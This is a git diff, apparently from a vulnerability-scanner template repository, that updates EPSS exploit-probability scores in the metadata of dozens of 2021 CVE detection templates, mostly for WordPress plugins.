epss-percentile: 0.55974 cpe: cpe:2.3:a:dwbooster:calendar_event_multi_view:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24499.yaml b/http/cves/2021/CVE-2021-24499.yaml index 4efaefc3fe..f6f53e6edb 100644 --- a/http/cves/2021/CVE-2021-24499.yaml +++ b/http/cves/2021/CVE-2021-24499.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24499 cwe-id: CWE-434 epss-score: 0.19069 - epss-percentile: 0.95597 + epss-percentile: 0.95664 cpe: cpe:2.3:a:amentotech:workreap:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml index c694b6fe92..c50457b85c 100644 --- a/http/cves/2021/CVE-2021-24510.yaml +++ b/http/cves/2021/CVE-2021-24510.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24510 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.49453 + epss-percentile: 0.4982 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:*:*:*:*:wordpress:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index fbc6e0dfe0..fa2de013bc 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24554 cwe-id: CWE-89 - epss-score: 0.13127 - epss-percentile: 0.94817 + epss-score: 0.15547 + epss-percentile: 0.95283 cpe: cpe:2.3:a:freelancetoindia:paytm-pay:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml index bfbd04e335..8a70976baa 100644 --- a/http/cves/2021/CVE-2021-24647.yaml +++ b/http/cves/2021/CVE-2021-24647.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24647 cwe-id: CWE-287 epss-score: 0.2135 - epss-percentile: 0.9579 + epss-percentile: 0.95857 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-24666.yaml b/http/cves/2021/CVE-2021-24666.yaml index ede35685d7..c8273109d7 100644 --- a/http/cves/2021/CVE-2021-24666.yaml +++ b/http/cves/2021/CVE-2021-24666.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24666 cwe-id: CWE-89 - epss-score: 0.20933 - epss-percentile: 0.95759 + epss-score: 0.23542 + epss-percentile: 0.96007 cpe: cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index ab3241ca72..a75cf8349b 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24731 cwe-id: CWE-89 - epss-score: 0.17893 - epss-percentile: 0.95474 + epss-score: 0.19524 + epss-percentile: 0.95705 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml index b38d486877..3c2be8041b 100644 --- a/http/cves/2021/CVE-2021-24746.yaml +++ b/http/cves/2021/CVE-2021-24746.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24746 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45304 + epss-score: 0.00122 + epss-percentile: 0.46081 cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index f4f4af92d8..eaf3fee302 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24750 cwe-id: CWE-89 epss-score: 0.00791 - epss-percentile: 0.79355 + epss-percentile: 0.79576 cpe: cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\):*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml index f86205bb4b..3ba92438a6 100644 --- a/http/cves/2021/CVE-2021-24762.yaml +++ b/http/cves/2021/CVE-2021-24762.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24762 cwe-id: CWE-89 epss-score: 0.00848 - epss-percentile: 0.80045 + epss-percentile: 0.80267 cpe: cpe:2.3:a:getperfectsurvey:perfect_survey:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index 9562750625..795d6630b4 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24827 cwe-id: CWE-89 - epss-score: 0.17594 - epss-percentile: 0.95442 + epss-score: 0.11922 + epss-percentile: 0.94693 cpe: cpe:2.3:a:asgaros:asgaros_forum:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml index 0101da3f88..fdc21d8468 100644 --- a/http/cves/2021/CVE-2021-24838.yaml +++ b/http/cves/2021/CVE-2021-24838.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24838 cwe-id: CWE-601 epss-score: 0.00106 - epss-percentile: 0.42451 + epss-percentile: 0.42795 cpe: cpe:2.3:a:bologer:anycomment:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index 0526fe9643..8f5dc20898 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24862 cwe-id: CWE-89 - epss-score: 0.61777 - epss-percentile: 0.97374 + epss-score: 0.68026 + epss-percentile: 0.97584 cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml index f53d6b8b22..700f14cdb0 100644 --- a/http/cves/2021/CVE-2021-24875.yaml +++ b/http/cves/2021/CVE-2021-24875.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24875 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.49453 + epss-percentile: 0.4982 cpe: cpe:2.3:a:implecode:ecommerce_product_catalog:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index c51d552657..37bb66ac45 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24891 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.44609 + epss-percentile: 0.44995 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24910.yaml b/http/cves/2021/CVE-2021-24910.yaml index fbe7dc897c..6f49894fa7 100644 --- a/http/cves/2021/CVE-2021-24910.yaml +++ b/http/cves/2021/CVE-2021-24910.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24910 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.39802 + epss-percentile: 0.40156 cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml index 24f1c78e7b..9f09308e50 100644 --- a/http/cves/2021/CVE-2021-24917.yaml +++ b/http/cves/2021/CVE-2021-24917.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24917 cwe-id: CWE-863 - epss-score: 0.04226 - epss-percentile: 0.91138 + epss-score: 0.04442 + epss-percentile: 0.91441 cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24926.yaml b/http/cves/2021/CVE-2021-24926.yaml index d489511a16..1c15074402 100644 --- a/http/cves/2021/CVE-2021-24926.yaml +++ b/http/cves/2021/CVE-2021-24926.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24926 cwe-id: CWE-79 epss-score: 0.00171 - epss-percentile: 0.53541 + epss-percentile: 0.53934 cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml index 95ad909099..f7f5973e15 100644 --- a/http/cves/2021/CVE-2021-24931.yaml +++ b/http/cves/2021/CVE-2021-24931.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24931 cwe-id: CWE-89 - epss-score: 0.12212 - epss-percentile: 0.94654 + epss-score: 0.43012 + epss-percentile: 0.96908 cpe: cpe:2.3:a:ays-pro:secure_copy_content_protection_and_content_locking:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index 79473b6045..97e786600c 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24940 cwe-id: CWE-79 - epss-score: 0.00141 - epss-percentile: 0.49173 + epss-score: 0.00106 + epss-percentile: 0.42795 cpe: cpe:2.3:a:woocommerce:persian-woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index 2c1b45b0b4..320bbf6c6c 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24946 cwe-id: CWE-89 - epss-score: 0.05911 - epss-percentile: 0.92472 + epss-score: 0.11052 + epss-percentile: 0.94489 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml index caa7b393e6..27f6a3c370 100644 --- a/http/cves/2021/CVE-2021-24947.yaml +++ b/http/cves/2021/CVE-2021-24947.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-24947 cwe-id: CWE-352,CWE-863 - epss-score: 0.00444 - epss-percentile: 0.71723 + epss-score: 0.00413 + epss-percentile: 0.71018 cpe: cpe:2.3:a:thinkupthemes:responsive_vector_maps:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24956.yaml b/http/cves/2021/CVE-2021-24956.yaml index 7f2280bad2..1d4c9d6e60 100644 --- a/http/cves/2021/CVE-2021-24956.yaml +++ b/http/cves/2021/CVE-2021-24956.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24956 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42451 + epss-percentile: 0.42795 cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml index 5fa6ee4e85..6671edb8d4 100644 --- a/http/cves/2021/CVE-2021-24970.yaml +++ b/http/cves/2021/CVE-2021-24970.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24970 cwe-id: CWE-22 - epss-score: 0.02825 - epss-percentile: 0.89345 + epss-score: 0.03639 + epss-percentile: 0.90597 cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24987.yaml b/http/cves/2021/CVE-2021-24987.yaml index 8a9bc56191..3d46d82552 100644 --- a/http/cves/2021/CVE-2021-24987.yaml +++ b/http/cves/2021/CVE-2021-24987.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24987 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.39802 + epss-score: 0.00115 + epss-percentile: 0.44861 cpe: cpe:2.3:a:heateor:super_socializer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24991.yaml b/http/cves/2021/CVE-2021-24991.yaml index 031bf5fbdc..4f88efac89 100644 --- a/http/cves/2021/CVE-2021-24991.yaml +++ b/http/cves/2021/CVE-2021-24991.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24991 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.28575 + epss-percentile: 0.28909 cpe: cpe:2.3:a:wpovernight:woocommerce_pdf_invoices\&_packing_slips:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml index edea93be49..a06eb096eb 100644 --- a/http/cves/2021/CVE-2021-24997.yaml +++ b/http/cves/2021/CVE-2021-24997.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-24997 cwe-id: CWE-862 - epss-score: 0.00213 - epss-percentile: 0.5851 + epss-score: 0.00224 + epss-percentile: 0.60418 cpe: cpe:2.3:a:wp-guppy:wp_guppy:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml index 3f9619324c..39a4a1775c 100644 --- a/http/cves/2021/CVE-2021-25003.yaml +++ b/http/cves/2021/CVE-2021-25003.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-25003 cwe-id: CWE-434,CWE-94 - epss-score: 0.5944 - epss-percentile: 0.97311 + epss-score: 0.61252 + epss-percentile: 0.97421 cpe: cpe:2.3:a:wptaskforce:wpcargo_track_\&_trace:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml index f2a0e226e6..426682fe1e 100644 --- a/http/cves/2021/CVE-2021-25008.yaml +++ b/http/cves/2021/CVE-2021-25008.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-25008 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42451 + epss-percentile: 0.42795 cpe: cpe:2.3:a:codesnippets:code_snippets:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25028.yaml b/http/cves/2021/CVE-2021-25028.yaml index f9fc0718ea..0294cb9d60 100644 --- a/http/cves/2021/CVE-2021-25028.yaml +++ b/http/cves/2021/CVE-2021-25028.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-25028 cwe-id: CWE-601 epss-score: 0.00106 - epss-percentile: 0.42451 + epss-percentile: 0.42795 cpe: cpe:2.3:a:tri:event_tickets:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml index addaa72dab..f0d90e2a2f 100644 --- a/http/cves/2021/CVE-2021-25033.yaml +++ b/http/cves/2021/CVE-2021-25033.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25033 cwe-id: CWE-601 - epss-score: 0.00115 - epss-percentile: 0.44376 + epss-score: 0.001 + epss-percentile: 0.40828 cpe: cpe:2.3:a:noptin:noptin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml index 4c593e419e..85524d01c5 100644 --- a/http/cves/2021/CVE-2021-25052.yaml +++ b/http/cves/2021/CVE-2021-25052.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25052 cwe-id: CWE-352 - epss-score: 0.01231 - epss-percentile: 0.83713 + epss-score: 0.01852 + epss-percentile: 0.86965 cpe: cpe:2.3:a:wow-company:button_generator:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml index e75c2df9d8..01f7f22e6a 100644 --- a/http/cves/2021/CVE-2021-25055.yaml +++ b/http/cves/2021/CVE-2021-25055.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25055 cwe-id: CWE-79 - epss-score: 0.00133 - epss-percentile: 0.47722 + epss-score: 0.001 + epss-percentile: 0.40828 cpe: cpe:2.3:a:feedwordpress_project:feedwordpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml index 66dea422af..6eae3f58b1 100644 --- a/http/cves/2021/CVE-2021-25063.yaml +++ b/http/cves/2021/CVE-2021-25063.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-25063 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42451 + epss-percentile: 0.42795 cpe: cpe:2.3:a:cf7skins:contact_form_7_skins:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index 22364bc9ed..b41574251f 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-25065 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.28379 + epss-percentile: 0.28715 cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml index 9125965f48..18b1d57d14 100644 --- a/http/cves/2021/CVE-2021-25067.yaml +++ b/http/cves/2021/CVE-2021-25067.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-25067 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.28379 + epss-percentile: 0.28715 cpe: cpe:2.3:a:pluginops:landing_page:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml index b202a4b5fe..e81f8f2308 100644 --- a/http/cves/2021/CVE-2021-25074.yaml +++ b/http/cves/2021/CVE-2021-25074.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-25074 cwe-id: CWE-601 epss-score: 0.00106 - epss-percentile: 0.42451 + epss-percentile: 0.42795 cpe: cpe:2.3:a:webp_converter_for_media_project:webp_converter_for_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml index 9ad31424fd..52ba1eaaa2 100644 --- a/http/cves/2021/CVE-2021-25075.yaml +++ b/http/cves/2021/CVE-2021-25075.yaml @@ -16,8 +16,8 @@ info: cvss-score: 3.5 cve-id: CVE-2021-25075 cwe-id: CWE-862 - epss-score: 0.00094 - epss-percentile: 0.39063 + epss-score: 0.00071 + epss-percentile: 0.29363 cpe: cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index 3b549083e8..b608dbbd95 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-25078 cwe-id: CWE-79 epss-score: 0.00382 - epss-percentile: 0.696 + epss-percentile: 0.69924 cpe: cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml index 281155b8ef..02729c5138 100644 --- a/http/cves/2021/CVE-2021-25085.yaml +++ b/http/cves/2021/CVE-2021-25085.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25085 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40521 + epss-percentile: 0.40828 cpe: cpe:2.3:a:pluginus:woocommerce_products_filter:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml index 094e8177a7..46f7343c73 100644 --- a/http/cves/2021/CVE-2021-25099.yaml +++ b/http/cves/2021/CVE-2021-25099.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25099 cwe-id: CWE-79 - epss-score: 0.00133 - epss-percentile: 0.47722 + epss-score: 0.001 + epss-percentile: 0.40828 cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25104.yaml b/http/cves/2021/CVE-2021-25104.yaml index 94d59a65c9..c2d7bb18f1 100644 --- a/http/cves/2021/CVE-2021-25104.yaml +++ b/http/cves/2021/CVE-2021-25104.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-25104 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45304 + epss-percentile: 0.45683 cpe: cpe:2.3:a:oceanwp:ocean_extra:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml index bfabd96388..77759e195d 100644 --- a/http/cves/2021/CVE-2021-25111.yaml +++ b/http/cves/2021/CVE-2021-25111.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25111 cwe-id: CWE-601 - epss-score: 0.0012 - epss-percentile: 0.45408 + epss-score: 0.00141 + epss-percentile: 0.49543 cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25112.yaml b/http/cves/2021/CVE-2021-25112.yaml index 559c3259ce..c2ee743c4e 100644 --- a/http/cves/2021/CVE-2021-25112.yaml +++ b/http/cves/2021/CVE-2021-25112.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25112 cwe-id: CWE-79 - epss-score: 0.00133 - epss-percentile: 0.47722 + epss-score: 0.001 + epss-percentile: 0.40828 cpe: cpe:2.3:a:i-plugins:whmcs_bridge:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index e09fcadd57..5d868b54f6 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-25114 cwe-id: CWE-89 - epss-score: 0.04575 - epss-percentile: 0.91459 + epss-score: 0.04964 + epss-percentile: 0.91923 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25118.yaml b/http/cves/2021/CVE-2021-25118.yaml index 700e06b021..decbf72957 100644 --- a/http/cves/2021/CVE-2021-25118.yaml +++ b/http/cves/2021/CVE-2021-25118.yaml @@ -15,8 +15,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-25118 cwe-id: CWE-200 - epss-score: 0.00206 - epss-percentile: 0.57883 + epss-score: 0.00155 + epss-percentile: 0.51627 cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25120.yaml b/http/cves/2021/CVE-2021-25120.yaml index 311daa2f17..0f1fd0a6f9 100644 --- a/http/cves/2021/CVE-2021-25120.yaml +++ b/http/cves/2021/CVE-2021-25120.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25120 cwe-id: CWE-79 - epss-score: 0.0012 - epss-percentile: 0.45408 + epss-score: 0.00141 + epss-percentile: 0.49543 cpe: cpe:2.3:a:easysocialfeed:easy_social_feed:*:*:*:*:pro:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25281.yaml b/http/cves/2021/CVE-2021-25281.yaml index d4e71f453f..8fec77d7e0 100644 --- a/http/cves/2021/CVE-2021-25281.yaml +++ b/http/cves/2021/CVE-2021-25281.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-25281 cwe-id: CWE-287 - epss-score: 0.84879 - epss-percentile: 0.9806 + epss-score: 0.84203 + epss-percentile: 0.98099 cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index 1f45935357..0968aafc24 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25296 cwe-id: CWE-78 epss-score: 0.89404 - epss-percentile: 0.98323 + epss-percentile: 0.98392 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index 50b16d5ca5..bfe59b1739 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25297 cwe-id: CWE-78 epss-score: 0.89404 - epss-percentile: 0.98323 + epss-percentile: 0.98392 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 1dc28fc9f5..31113e2454 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25298 cwe-id: CWE-78 epss-score: 0.97378 - epss-percentile: 0.99861 + epss-percentile: 0.99876 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml index 216d6953f4..2b5b6e8210 100644 --- a/http/cves/2021/CVE-2021-25299.yaml +++ b/http/cves/2021/CVE-2021-25299.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25299 cwe-id: CWE-79 - epss-score: 0.96825 - epss-percentile: 0.99548 + epss-score: 0.96845 + epss-percentile: 0.99576 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index 216a63294c..9e9d3006e9 100644 --- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25646 cwe-id: CWE-732 - epss-score: 0.97361 - epss-percentile: 0.99843 + epss-score: 0.97391 + epss-percentile: 0.99887 cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml index d1673d2380..ff5e690501 100644 --- a/http/cves/2021/CVE-2021-25864.yaml +++ b/http/cves/2021/CVE-2021-25864.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-25864 cwe-id: CWE-22 - epss-score: 0.53923 - epss-percentile: 0.97171 + epss-score: 0.35725 + epss-percentile: 0.96647 cpe: cpe:2.3:a:dgtl:huemagic:3.0.0:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index 2e7c1d2104..7ddcea1ae1 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-25899 cwe-id: CWE-89 - epss-score: 0.54555 - epss-percentile: 0.97184 + epss-score: 0.5197 + epss-percentile: 0.97173 cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml index 10369d9c7f..7103ff3ddb 100644 --- 